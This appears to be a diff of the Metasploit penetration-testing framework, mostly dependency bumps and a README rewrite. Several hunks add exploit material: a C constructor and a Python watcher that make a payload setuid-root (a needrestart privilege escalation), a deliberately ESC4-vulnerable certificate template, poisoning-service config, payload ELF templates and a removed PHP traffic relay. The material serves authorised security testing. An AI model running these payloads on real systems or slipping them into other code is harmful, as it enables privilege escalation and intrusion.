-rex-exploitation, 0.1.39, "New BSD"
+rex-exploitation, 0.1.40, "New BSD"
 rex-java, 0.1.7, "New BSD"
 rex-mime, 0.1.8, "New BSD"
 rex-nop, 0.1.3, "New BSD"
 rex-ole, 0.1.8, "New BSD"
-rex-powershell, 0.1.99, "New BSD"
-rex-random_identifier, 0.1.12, "New BSD"
+rex-powershell, 0.1.100, "New BSD"
+rex-random_identifier, 0.1.13, "New BSD"
 rex-registry, 0.1.5, "New BSD"
 rex-rop_builder, 0.1.5, "New BSD"
-rex-socket, 0.1.57, "New BSD"
+rex-socket, 0.1.58, "New BSD"
 rex-sslscan, 0.1.10, "New BSD"
 rex-struct2, 0.1.4, "New BSD"
-rex-text, 0.2.58, "New BSD"
+rex-text, 0.2.59, "New BSD"
 rex-zip, 0.1.5, "New BSD"
-rexml, 3.3.6, "Simplified BSD"
+rexml, 3.3.9, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.13.0, MIT
-rspec-core, 3.13.0, MIT
-rspec-expectations, 3.13.2, MIT
-rspec-mocks, 3.13.1, MIT
-rspec-rails, 6.1.4, MIT
+rspec-core, 3.13.2, MIT
+rspec-expectations, 3.13.3, MIT
+rspec-mocks, 3.13.2, MIT
+rspec-rails, 7.0.1, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.13.1, MIT
-rubocop, 1.64.1, MIT
-rubocop-ast, 1.31.3, MIT
-ruby-macho, 4.0.1, MIT
+rubocop, 1.67.0, MIT
+rubocop-ast, 1.33.0, MIT
+ruby-macho, 4.1.0, MIT
 ruby-mysql, 4.1.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.3.10, "New BSD"
-rubyntlm, 0.6.4, MIT
+ruby_smb, 3.3.13, "New BSD"
+rubyntlm, 0.6.5, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
-simplecov-html, 0.12.3, MIT
+simplecov-html, 0.13.1, MIT
 simpleidn, 0.2.3, MIT
 sinatra, 3.2.0, MIT
 sqlite3, 1.7.3, "New BSD"
 sshkey, 3.0.0, MIT
 strptime, 0.2.5, "Simplified BSD"
-strscan, 3.1.0, "ruby, Simplified BSD"
 swagger-blocks, 3.0.0, MIT
 systemu, 2.6.5, ruby
-test-prof, 1.3.3, MIT
+test-prof, 1.4.2, MIT
 thin, 1.8.2, "GPL-2.0+, ruby"
-thor, 1.3.1, MIT
-tilt, 2.3.0, MIT
-timecop, 0.9.9, MIT
+thor, 1.3.2, MIT
+tilt, 2.4.0, MIT
+timecop, 0.9.10, MIT
 timeout, 0.4.1, "ruby, Simplified BSD"
 ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
 tzinfo, 2.0.6, MIT
-tzinfo-data, 1.2024.1, MIT
-unicode-display_width, 2.5.0, MIT
+tzinfo-data, 1.2024.2, MIT
+unicode-display_width, 2.6.0, MIT
 unix-crypt, 1.3.1, 0BSD
 uuid, 2.3.9, MIT
 warden, 1.2.9, MIT
-webrick, 1.8.1, "ruby, Simplified BSD"
+webrick, 1.8.2, "ruby, Simplified BSD"
 websocket-driver, 0.7.6, "Apache 2.0"
 websocket-extensions, 0.1.5, "Apache 2.0"
 win32api, 0.1.0, unknown
 windows_error, 0.1.5, BSD
-winrm, 2.3.6, "Apache 2.0"
+winrm, 2.3.9, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.3, "ruby, Simplified BSD"
-yard, 0.9.36, MIT
-zeitwerk, 2.6.17, MIT
+yard, 0.9.37, MIT
+zeitwerk, 2.6.18, MIT
@@ -1,52 +1,45 @@
-Metasploit [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
-==
-The Metasploit Framework is released under a BSD-style license. See
-[COPYING](COPYING) for more details.
+# Metasploit Framework

-The latest version of this software is available from: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html
+The Metasploit Framework is an open-source tool released under a BSD-style license. For detailed licensing information, refer to the `COPYING` file.

-You can find documentation on Metasploit and how to use it at:
- https://docs.metasploit.com/
+## Latest Version
+Access the latest version of Metasploit from the [Nightly Installers](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html) page.

-Information about setting up a development environment can be found at:
- https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html
+## Documentation
+Comprehensive documentation, including usage guides, is available at [Metasploit Docs](https://docs.metasploit.com/).

-Our bug and feature request tracker can be found at:
- https://github.com/rapid7/metasploit-framework/issues
+## Development Environment
+To set up a development environment, visit the [Development Setup Guide](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html).

-New bugs and feature requests should be directed to:
-  https://r-7.co/MSF-BUGv1
+## Bug and Feature Requests
+Submit bugs and feature requests via the [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues) tracker. New submissions can be made through the [MSF-BUGv1 form](https://github.com/rapid7/metasploit-framework/issues/new/choose).

-API documentation for writing modules can be found at:
-  https://docs.metasploit.com/api/
+## API Documentation
+For information on writing modules, refer to the [API Documentation](https://docs.metasploit.com/api/).

-Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
+## Support and Communication
+For questions and suggestions, join the Freenode IRC channel or contact the metasploit-hackers mailing list.

-Installing
--
+## Installing Metasploit

-Generally, you should use [the free installer](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html),
-which contains all of the dependencies and will get you up and running with a
-few clicks. See the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) if
-you'd like to deal with dependencies on your own.
+### Recommended Installation

-Using Metasploit
--
-Metasploit can do all sorts of things. The first thing you'll want to do
-is start `msfconsole`, but after that, you'll probably be best served by
-reading the basics of [using Metasploit](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html)
-or [Metasploit Unleashed][unleashed].
+We recommend installation with the [official Metasploit installers](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html#installing-metasploit-on-linux--macos) on Linux or macOS. Metasploit is also pre-installed with Kali.

-Contributing
--
-See the [Dev Environment Setup][devenv] guide on GitHub, which will
-walk you through the whole process from installing all the
-dependencies, to cloning the repository, and finally to submitting a
-pull request. For slightly more information, see
-[Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
+For a manual setup, consult the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) guide.

+## Using Metasploit

-[devenv]: https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html "Metasploit Development Environment Setup"
-[unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
+To get started with Metasploit:

+1. **Start `msfconsole`:** This is the primary interface for interacting with Metasploit.
+2. **Explore Resources:** 
+   - Visit the [Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/getting-started/index.html) section of the documentation.

+## Contributing
+
+To contribute to Metasploit:
+
+1. **Setup Development Environment:** Follow the instructions in the [Development Setup Guide](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) on GitHub.
+2. **Clone the Repository:** Obtain the source code from the official repository.
+3. **Submit a Pull Request:** After making changes, submit a pull request for review. Additional details can be found in the [Contributing Guide](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
@@ -10,6 +10,8 @@ info:
  x-cortex-type: service
  x-cortex-domain-parents:
  - tag: metasploit
+  x-cortex-groups:
+  - exposure:external-ship
 openapi: 3.0.1
 servers:
 - url: "/"
@@ -0,0 +1,30 @@
+---
+# Creates a template that will be vulnerable to ESC4 (certificate has weak edit permissions).
+# Fields are based on the SubCA template. For field descriptions,
+# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
+showInAdvancedViewOnly: 'TRUE'
+# this security descriptor grants all permissions to all authenticated users (this is what makes the template vulnerable to ESC4)
+nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+flags: 0
+pKIDefaultKeySpec: 2
+pKIKeyUsage: !binary |-
+  hgA=
+pKIMaxIssuingDepth: 0
+pKICriticalExtensions:
+  - 2.5.29.19
+  - 2.5.29.15
+pKIExtendedKeyUsage:
+# Server Authentication OID (Not necessary although if left blank this template would also be vulnerable to ESC2)
+  - 1.3.6.1.5.5.7.3.1
+pKIExpirationPeriod: !binary |-
+  AEAepOhl+v8=
+pKIOverlapPeriod: !binary |-
+  AICmCv/e//8=
+pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
+msPKI-RA-Signature: 0
+msPKI-Enrollment-Flag: 0
+# CT_FLAG_EXPORTABLE_KEY
+msPKI-Private-Key-Flag: 0x10
+# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
+msPKI-Certificate-Name-Flag: 0x82000000
+msPKI-Minimal-Key-Size: 2048
@@ -373,3 +373,17 @@ queries:
      - https://malicious.link/post/2022/ldapsearch-reference/
      - https://burmat.gitbook.io/security/hacking/domain-exploitation
      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+  - action: ENUM_PRE_WINDOWS_2000_COMPUTERS
+    description: 'Dump info about all computer objects likely created as a "pre-Windows 2000 computer", for which the password might be predictable.'
+    filter: '(&(userAccountControl=4128))'
+    attributes:
+      - cn
+      - displayName
+      - description
+      - sAMAccountName
+      - userPrincipalName
+      - logonCount
+      - userAccountControl
+    references:
+      - https://www.thehacker.recipes/ad/movement/builtins/pre-windows-2000-computers
+      - https://trustedsec.com/blog/diving-into-pre-created-computer-accounts
@@ -1,3 +1,4 @@
+# configuration file for the capture plugin
 spoof_regex: .*
 ntlm_challenge: "1122334455667788"
 ntlm_domain: anonymous
@@ -6,6 +7,7 @@ ssl_cert: null
 logfile: null
 hashdir: null
 services:
+  # authentication services
  - type: DRDA
    enabled: yes
  - type: FTP
@@ -46,6 +48,7 @@ services:
    enabled: yes
  - type: SMTPS
    enabled: yes
+  # spoofing / poisoning services
  - type: NBNS
    enabled: yes
  - type: LLMNR
@@ -13,4 +13,4 @@ responsible for corrupting the Metasploit Framework installation.

 For more information about EICAR, please see the following web site:

-http://www.eicar.org/anti_virus_test_file.htm
+https://www.eicar.org/download-anti-malware-testfile/
@@ -0,0 +1,27 @@
+/*
+// system call
+#include <stdlib.h>
+// setuid, setgid
+#include <unistd.h>
+
+static void a() __attribute__((constructor));
+
+void a() {
+  setuid(0);
+  setgid(0);
+  const char *shell = "chown root:root PAYLOAD_PATH; chmod a+x PAYLOAD_PATH; chmod u+s PAYLOAD_PATH &";
+  system(shell);
+}
+*/
+
+extern int setuid(int);
+extern int setgid(int);
+extern int system(const char *__s);
+
+void a(void) __attribute__((constructor));
+
+void __attribute__((constructor)) a() {
+  setuid(0);
+  setgid(0);
+  system("chown root:root 'PAYLOAD_PATH'; chmod a+x,u+s 'PAYLOAD_PATH'");
+}
@@ -0,0 +1,17 @@
+import os
+import time
+import pwd
+
+print("#########################\n\nDont mind the error message above\n\nWaiting for needrestart to run...")
+
+while True:
+    try:
+        file_stat = os.stat('PAYLOAD_PATH')
+    except FileNotFoundError:
+        exit()
+    username = pwd.getpwuid(file_stat.st_uid).pw_name
+    #print(f"Payload owned by: {username}. Stats: {file_stat}")
+    if (username == 'root'):
+        os.system('PAYLOAD_PATH &')
+        exit()
+    time.sleep(1)
@@ -1,68 +0,0 @@
-<?php
-$magic = 'TzGq';
-$tempdir = sys_get_temp_dir() . "/hop" . $magic;
-if(!is_dir($tempdir)){
-	mkdir($tempdir); //make sure it's there
-}
-
-//get url
-$url = $_SERVER["QUERY_STRING"];
-//like /path/hop.php?/uRIcksm_lOnGidENTifIEr
-
-//Looks for a file with a name or contents prefix, if found, send it and deletes it
-function findSendDelete($tempdir, $prefix, $one=true){
-	if($dh = opendir($tempdir)){
-		while(($file = readdir($dh)) !== false){
-			if(strpos($file, $prefix) !== 0){
-				continue;
-			}
-			readfile($tempdir."/".$file);
-			unlink($tempdir."/".$file);
-			if($one){
-				break;
-			}
-		}
-	}
-}
-
-//handle control
-if($url === "/control"){
-	if($_SERVER['REQUEST_METHOD'] === 'POST'){
-		//handle data for payload - save in a "down" file or the "init" file
-		$postdata = file_get_contents("php://input");
-		if(array_key_exists('HTTP_X_INIT', $_SERVER)){
-			$f = fopen($tempdir."/init", "w"); //only one init file
-		}else{
-			$prefix = "down_" . sha1($_SERVER['HTTP_X_URLFRAG']);
-			$f = fopen(tempnam($tempdir,$prefix), "w");
-		}
-		fwrite($f, $postdata);
-		fclose($f);
-	}else{
-		findSendDelete($tempdir, "up_", false);
-	}
-}else if($_SERVER['REQUEST_METHOD'] === 'POST'){
-	//get data
-	$postdata = file_get_contents("php://input");
-	//See if we should send anything down
-	if($postdata === "RECV\x00" || $postdata === "RECV"){
-		findSendDelete($tempdir, "down_" . sha1($url));
-		$fname = $tempdir . "/up_recv_" . sha1($url); //Only keep one RECV poll
-	}else{
-		$fname = tempnam($tempdir, "up_"); //actual data gets its own filename
-	}
-	//find free and write new file
-	$f = fopen($fname, "w");
-	fwrite($f, $magic);
-	//Little-endian pack length and data
-	$urlen = strlen($url);
-	fwrite($f, pack('V', $urlen));
-	fwrite($f, $url);
-	$postdatalen = strlen($postdata);
-	fwrite($f, pack('V', $postdatalen));
-	fwrite($f, $postdata);
-	fclose($f);
-//Initial query will be a GET and have a 12345 in it
-}else if(strpos($url, "12345") !== FALSE){
-	readfile($tempdir."/init");
-}
@@ -0,0 +1,98 @@
+; build with:
+;   nasm elf_dll_riscv32le_template.s -f bin -o template_riscv32le_linux_dll.bin
+
+BITS 32
+
+org     0
+
+ehdr:
+  db    0x7f, "ELF", 1, 1, 1, 0    ; e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0
+  dw    3                          ; e_type    = ET_DYN
+  dw    0xF3                       ; e_machine = EM_RISCV
+  dd    1                          ; e_version = EV_CURRENT
+  dd    _start                     ; e_entry   = _start
+  dd    phdr - $$                  ; e_phoff
+  dd    shdr - $$                  ; e_shoff
+  dd    0                          ; e_flags
+  dw    ehdrsize                   ; e_ehsize
+  dw    phdrsize                   ; e_phentsize
+  dw    2                          ; e_phnum
+  dw    shentsize                  ; e_shentsize
+  dw    2                          ; e_shnum
+  dw    1                          ; e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:
+  dd    1                          ; p_type       = PT_LOAD
+  dd    0                          ; p_offset
+  dd    $$                         ; p_vaddr
+  dd    $$                         ; p_paddr
+  dd    0xDEADBEEF                 ; p_filesz
+  dd    0xDEADBEEF                 ; p_memsz
+  dd    7                          ; p_flags      = rwx
+  dd    0x1000                     ; p_align
+
+phdrsize equ  $ - phdr
+
+  dd    2                          ; p_type  = PT_DYNAMIC
+  dd    7                          ; p_flags = rwx
+  dd    dynsection                 ; p_offset
+  dd    dynsection                 ; p_vaddr
+  dd    dynsection                 ; p_vaddr
+  dd    dynsz                      ; p_filesz
+  dd    dynsz                      ; p_memsz
+  dd    0x1000                     ; p_align
+
+shdr:
+  dd    1                          ; sh_name
+  dd    6                          ; sh_type = SHT_DYNAMIC
+  dd    0                          ; sh_flags
+  dd    dynsection                 ; sh_addr
+  dd    dynsection                 ; sh_offset
+  dd    dynsz                      ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dd    8                          ; sh_addralign
+  dd    7                          ; sh_entsize
+shentsize equ $ - shdr
+  dd    0                          ; sh_name
+  dd    3                          ; sh_type = SHT_STRTAB
+  dd    0                          ; sh_flags
+  dd    strtab                     ; sh_addr
+  dd    strtab                     ; sh_offset
+  dd    strtabsz                   ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dd    0                          ; sh_addralign
+  dd    0                          ; sh_entsize
+
+dynsection:
+; DT_INIT
+  dd    0x0c
+  dd    _start
+; DT_STRTAB
+  dd    0x05
+  dd    strtab
+; DT_SYMTAB
+  dd    0x06
+  dd    strtab
+; DT_STRSZ
+  dd    0x0a
+  dd    0
+; DT_SYMENT
+  dd    0x0b
+  dd    0
+; DT_NULL
+  dd    0x00
+  dd    0
+dynsz equ $ - dynsection
+
+strtab:
+ db 0
+ db 0
+strtabsz equ $ - strtab
+
+global _start
+_start:
@@ -0,0 +1,99 @@
+; build with:
+;   nasm elf_dll_riscv64le_template.s -f bin -o template_riscv64le_linux_dll.bin
+
+BITS 64
+
+org     0
+
+ehdr:                            ; Elf64_Ehdr
+  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    3                        ;   e_type       = ET_DYN
+  dw    0xF3                     ;   e_machine    = RISCV
+  dd    1                        ;   e_version
+  dq    _start                   ;   e_entry
+  dq    phdr - $$                ;   e_phoff
+  dq    shdr - $$                ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    2                        ;   e_phnum
+  dw    shentsize                ;   e_shentsize
+  dw    2                        ;   e_shnum
+  dw    1                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    7                        ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    $$                       ;   p_vaddr
+  dq    $$                       ;   p_paddr
+  dq    0xDEADBEEF               ;   p_filesz
+  dq    0xDEADBEEF               ;   p_memsz
+  dq    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+  dd    2                          ; p_type  = PT_DYNAMIC
+  dd    7                          ; p_flags = rwx
+  dq    dynsection                 ; p_offset
+  dq    dynsection                 ; p_vaddr
+  dq    dynsection                 ; p_vaddr
+  dq    dynsz                      ; p_filesz
+  dq    dynsz                      ; p_memsz
+  dq    0x1000                     ; p_align
+
+shdr:
+  dd    1                          ; sh_name
+  dd    6                          ; sh_type = SHT_DYNAMIC
+  dq    0                          ; sh_flags
+  dq    dynsection                 ; sh_addr
+  dq    dynsection                 ; sh_offset
+  dq    dynsz                      ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dq    8                          ; sh_addralign
+  dq    7                          ; sh_entsize
+shentsize equ $ - shdr
+  dd    0                          ; sh_name
+  dd    3                          ; sh_type = SHT_STRTAB
+  dq    0                          ; sh_flags
+  dq    strtab                     ; sh_addr
+  dq    strtab                     ; sh_offset
+  dq    strtabsz                   ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dq    0                          ; sh_addralign
+  dq    0                          ; sh_entsize
+
+dynsection:
+; DT_INIT
+  dq    0x0c
+  dq    _start
+; DT_STRTAB
+  dq    0x05
+  dq    strtab
+; DT_SYMTAB
+  dq    0x06
+  dq    strtab
+; DT_STRSZ
+  dq    0x0a
+  dq    0
+; DT_SYMENT
+  dq    0x0b
+  dq    0
+; DT_NULL
+  dq    0x00
+  dq    0
+
+dynsz equ $ - dynsection
+
+strtab:
+ db 0
+ db 0
+strtabsz equ $ - strtab
+
+align 16
+global _start
+_start:
@@ -9,7 +9,7 @@ ehdr:                            ; Elf32_Ehdr
  db    0, 0, 0, 0,  0, 0, 0, 0  ;
  dw    2                        ;   e_type       = ET_EXEC for an executable
  dw    0xB7                     ;   e_machine    = AARCH64
-  dd    0                        ;   e_version
+  dd    1                        ;   e_version
  dq    _start                   ;   e_entry
  dq    phdr - $$                ;   e_phoff
  dq    0                        ;   e_shoff
@@ -0,0 +1,42 @@
+; build with:
+;   nasm elf_riscv32le_template.s -f bin -o template_riscv32le_linux.bin
+
+BITS 32
+
+org     0x00010000
+
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 1, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    2                        ;   e_type       = ET_EXEC for an executable
+  dw    0xF3                     ;   e_machine    = RISCV
+  dd    1                        ;   e_version
+  dd    _start                   ;   e_entry
+  dd    phdr - $$                ;   e_phoff
+  dd    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    1                        ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    0                        ;   p_offset
+  dd    $$                       ;   p_vaddr
+  dd    $$                       ;   p_paddr
+  dd    0xDEADBEEF               ;   p_filesz
+  dd    0xDEADBEEF               ;   p_memsz
+  dd    7                        ;   p_flags      = rwx
+  dd    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+
+global _start
+
+_start:
+
@@ -0,0 +1,42 @@
+; build with:
+;   nasm elf_riscv64le_template.s -f bin -o template_riscv64le_linux.bin
+
+BITS 64
+
+org     0x00400000
+
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    2                        ;   e_type       = ET_EXEC for an executable
+  dw    0xF3                     ;   e_machine    = RISCV
+  dd    1                        ;   e_version
+  dq    _start                   ;   e_entry
+  dq    phdr - $$                ;   e_phoff
+  dq    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    1                        ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    7                        ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    $$                       ;   p_vaddr
+  dq    $$                       ;   p_paddr
+  dq    0xDEADBEEF               ;   p_filesz
+  dq    0xDEADBEEF               ;   p_memsz
+  dq    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+
+global _start
+
+_start:
+
@@ -1,67 +1,70 @@
-wordpress-popular-posts
-backup
-catch-themes-demo-import
-modern-events-calendar-lite
-ninja-forms
-simple-file-list
-sp-client-document-manager
-drag-and-drop-multiple-file-upload-contact-form-7
-wp-file-manager
-duplicator
-work-the-flow-file-upload
 ajax-load-more
-wpdiscuz
-wptouch
-front-end-editor
-wpshop
-plainview-activity-monitor
-sexy-contact-form
+all-in-one-wp-migration
+backup
+backup-backup
+boldgrid-backup
+bookingpress
+bulletproof-security
+catch-themes-demo-import
+chopslider
+custom-registration-form-builder-with-submission-manager
 download-manager
+drag-and-drop-multiple-file-upload-contact-form-7
+dukapress
+duplicator
+duplicator_download
+easy-wp-smtp
+elementor
+email-subscribers
+file-manager-advanced-shortcode
+front-end-editor
+gi-media-library
+give
+hash-form
 inboundio-marketing
-wp-mobile-detector
-website-contact-form-with-file-upload
-slideshow-gallery
-reflex-gallery
-wp-symposium
+learnpress
+loginizer
+masterstudy-lms-learning-management-system
+modern-events-calendar-lite
+modern-events-calendar-lite
+nextgen-gallery
+ninja-forms
+paid-memberships-pro
+perfect-survey
 photo-gallery
 pie-register
-wysija-newsletters
-dzs-zoomsounds
-all-in-one-wp-migration
-wp-ultimate-csv-importer
-wp-symposium
-masterstudy-lms-learning-management-system
-wp-gdpr-compliance
+plainview-activity-monitor
+post-smtp
+really-simple-ssl
+reflex-gallery
+royal-elementor-addons
+secure-copy-content-protection
+sexy-contact-form
+simple-backup
+simple-file-list
+slideshow-gallery
+sp-client-document-manager
+subscribe-to-comments
+ultimate-member
+website-contact-form-with-file-upload
+woocommerce-abandoned-cart
+woocommerce-payments
+wordpress-mobile-pack
+wordpress-popular-posts
+work-the-flow-file-upload
 wp-automatic
 wp-easycart
-dukapress
-loginizer
-email-subscribers
-wps-hide-login
-secure-copy-content-protection
-wordpress-mobile-pack
-learnpress
-wp-mobile-edition
-boldgrid-backup
-modern-events-calendar-lite
-gi-media-library
-chopslider
-bulletproof-security
-nextgen-gallery
-simple-backup
-subscribe-to-comments
-easy-wp-smtp
-duplicator_download
-custom-registration-form-builder-with-submission-manager
-woocommerce-abandoned-cart
-elementor
-bookingpress
-paid-memberships-pro
-woocommerce-payments
-file-manager-advanced-shortcode
-royal-elementor-addons
-backup-backup
-hash-form
-give
-ultimate-member
 wp-fastest-cache
+wp-file-manager
+wp-gdpr-compliance
+wp-mobile-detector
+wp-mobile-edition
+wp-symposium
+wp-symposium
+wp-time-capsule
+wp-ultimate-csv-importer
+wpdiscuz
+wps-hide-login
+wpshop
+wptouch
+wysija-newsletters
@@ -1,3 +1,3 @@
+bricks
 holding_pattern
 wplms
-bricks
@@ -1,2 +1,10 @@
-Contains `modules_metadata_base.json` which contains information about all modules within Metasploit, as well as
-`schema.rb` which describes current state of the database schema maintained by Rails ActiveRecord.
+This directory contains the following files:
+
+- `modules_metadata_base.json`, which contains information about all modules within Metasploit.
+- `schema.rb`, which is auto-generated from the current state of the database schema maintained by Rails ActiveRecord.
+  This file is auto-generated from the current state of the database.
+
+`schema.rb` is the source Rails uses to define your schema when running `bin/rails db:schema:load`. When creating a new 
+database, `bin/rails db:schema:load` tends to be faster and is potentially less error-prone than running all of your 
+migrations from scratch. Old migrations may fail to apply correctly if those migrations use external dependencies or 
+application code. We _strongly_ recommend that you check this file into your version control system.
@@ -1 +1 @@
-3.1.5
+3.2.5
@@ -6,6 +6,7 @@ gem 'just-the-docs', github: 'rapid7/just-the-docs', branch: 'r7_ver_custom'
 #gem 'just-the-docs', path: '../../just-the-docs'
 gem 'webrick'
 gem 'rexml'
+gem 'jekyll-sass-converter', '~> 2.2.0'

 group :jekyll_plugins do
  gem 'jekyll-sitemap'
@@ -12,22 +12,22 @@ GIT
 GEM
  remote: https://rubygems.org/
  specs:
-    addressable (2.8.1)
-      public_suffix (>= 2.0.2, < 6.0)
+    addressable (2.8.7)
+      public_suffix (>= 2.0.2, < 7.0)
    byebug (11.1.3)
    coderay (1.1.3)
    colorator (1.1.0)
-    concurrent-ruby (1.1.10)
+    concurrent-ruby (1.3.4)
    em-websocket (0.5.3)
      eventmachine (>= 0.12.9)
      http_parser.rb (~> 0)
    eventmachine (1.2.7)
-    ffi (1.15.5)
+    ffi (1.17.0)
    forwardable-extended (2.6.0)
    http_parser.rb (0.8.0)
-    i18n (1.12.0)
+    i18n (1.14.6)
      concurrent-ruby (~> 1.0)
-    jekyll (4.3.1)
+    jekyll (4.3.4)
      addressable (~> 2.4)
      colorator (~> 1.0)
      em-websocket (~> 0.5)
@@ -53,46 +53,45 @@ GEM
      jekyll (>= 3.7, < 5.0)
    jekyll-watch (2.2.1)
      listen (~> 3.0)
-    kramdown (2.4.0)
-      rexml
+    kramdown (2.5.1)
+      rexml (>= 3.3.9)
    kramdown-parser-gfm (1.1.0)
      kramdown (~> 2.0)
-    liquid (4.0.3)
-    listen (3.7.1)
+    liquid (4.0.4)
+    listen (3.9.0)
      rb-fsevent (~> 0.10, >= 0.10.3)
      rb-inotify (~> 0.9, >= 0.9.10)
    mercenary (0.4.0)
-    method_source (1.0.0)
+    method_source (1.1.0)
    pathutil (0.16.2)
      forwardable-extended (~> 2.6)
-    pry (0.14.1)
+    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.10.1)
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
-    public_suffix (5.0.1)
-    rake (13.0.6)
+    public_suffix (6.0.1)
+    rake (13.2.1)
    rb-fsevent (0.11.2)
-    rb-inotify (0.10.1)
+    rb-inotify (0.11.1)
      ffi (~> 1.0)
-    rexml (3.3.6)
-      strscan
-    rouge (4.0.0)
+    rexml (3.4.0)
+    rouge (4.5.1)
    safe_yaml (1.0.5)
    sassc (2.4.0)
      ffi (~> 1.9)
-    strscan (3.1.0)
    terminal-table (3.0.2)
      unicode-display_width (>= 1.1.1, < 3)
-    unicode-display_width (2.3.0)
-    webrick (1.7.0)
+    unicode-display_width (2.6.0)
+    webrick (1.9.1)

 PLATFORMS
  ruby

 DEPENDENCIES
  jekyll (~> 4.3.0)
+  jekyll-sass-converter (~> 2.2.0)
  jekyll-sitemap
  just-the-docs!
  pry-byebug
@@ -103,4 +102,4 @@ DEPENDENCIES
  webrick

 BUNDLED WITH
-   2.2.22
+   2.5.10
@@ -146,7 +146,7 @@ register_options(
  ], self.class)
 ```

-**8. Neglecting to use send_request_cgi()'s vars_get or vars_get when crafting a POST/GET request**
+**8. Neglecting to use send_request_cgi()'s vars_post or vars_get when crafting a POST/GET request**

 ```ruby
 data_post = 'user=jsmith&pass=hello123'
@@ -199,4 +199,4 @@ Metasploit3.new
 ```ruby
 # https://github.com/rapid7/metasploit-framework/issues/3853
 datastore['BAD'] = 'This is bad.'
-```
+```
@@ -59,6 +59,7 @@ Example:
 | CONFIG_CHANGES | Module modifies some config file |
